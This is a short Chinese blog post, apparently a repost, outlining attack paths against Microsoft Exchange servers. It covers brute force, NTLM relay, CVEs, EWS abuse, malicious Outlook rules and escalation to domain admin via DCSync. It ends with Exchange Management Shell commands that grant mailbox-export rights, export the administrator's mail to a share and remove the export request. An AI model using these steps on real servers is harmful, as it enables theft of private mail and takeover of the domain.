Exchange邮件服务器渗透

Exchange邮件服务器渗透,第1张

攻击手法分析

1、无凭据:

  • 爆破:利用401认证进行爆破
  • 泄露内网信息:利用msf:auxiliary/scanner/http/owa_iis_internal_ip,泄露Exchange内网IP地址
  • 配合钓鱼进行NTLM_Relay(工具:ExchangeRelayX)
  • 利用CVE进行获取权限

2、有凭据:

  • 导出邮箱列表
  • Exchange Rce漏洞
  • Exchange SSRF 进行NTLM_Relay
  • 使用Hash、密码 *** 作EWS接口
  • 攻击Outlook客户端:Outlook提供了一项“规则和通知”(Rules and Alerts)的功能,可以设置邮件接收和发送的策略,分为规则条件和动作,即用户定义当邮件满足某些条件时(如邮件主题包含特定词语),触发一个特定的动作,这个动作可以是对邮件的管理、处置,甚至是启动应用程序。
  • 从Exchange到域管:writeACL DCsync

3、常用命令

#在Exchange Management Shell下执行

Get-Mailbox          //获取数据库名
Get-MailboxDatabase  //获取数据库存储位置
Get-Mailboxstatistics -identity administrator | select DisplayName,ItemCount,TotalItemSize,LastLogonTime    //查看指定用户的邮箱使用信息
Get-ManagementRoleAssignment -role "Mailbox Import Export"   //查看导出权限
Get-MailboxExportRequest  //查看导出请求
Remove-MailboxExportRequest -Identity Administrator\mailboxexport //删除导出请求
New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export"  //给指定用户添加导出权限
New-MailboxExportRequest -Mailbox Administrator -FilePath \192.168.100.194\intepub\xx.pst  //导出指定用户邮件

 这里总结的不是很全,还请见谅,后续会继续整理。

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/716363.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-25
下一篇 2022-04-25

发表评论

登录后才能评论

评论列表(0条)

保存